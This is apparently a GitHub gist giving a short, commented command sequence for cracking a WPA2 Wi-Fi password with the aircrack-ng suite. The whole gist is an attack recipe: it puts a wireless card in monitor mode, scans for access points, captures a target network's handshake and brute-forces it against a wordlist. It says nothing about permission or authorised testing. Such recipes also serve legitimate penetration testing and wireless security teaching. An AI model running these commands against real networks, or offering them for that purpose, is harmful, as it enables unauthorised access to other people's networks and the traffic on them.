Skip to content

Instantly share code, notes, and snippets.

@jkullick
Last active February 12, 2024 17:46
Show Gist options
  • Save jkullick/da66688f662dfa848642a6a5b1172f79 to your computer and use it in GitHub Desktop.
Save jkullick/da66688f662dfa848642a6a5b1172f79 to your computer and use it in GitHub Desktop.
Crack WPA2 WLAN Password with aircrack-ng
# Put WLAN device in monitoring mode
airmon-ng start wlan0

# Scan for access points
airodump-ng wlan0mon

# Capture WPA2 handshake, use $BSSID and $CHANNEL from previous scan
# Wait until airodump says 'WPA handshake: ...' in the upper right of the terminal, then press `Ctrl+c` to stop scanning
airodump-ng -c $CHANNEL --bssid $BSSID -w $CAPTURE_FILE wlan0mon

# Bruteforce the WPA2 handshake with aircrack-ng and a wordlist
aircrack-ng $CAPTURE_FILE-01.cap  -w $WORDLIST_FILE
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment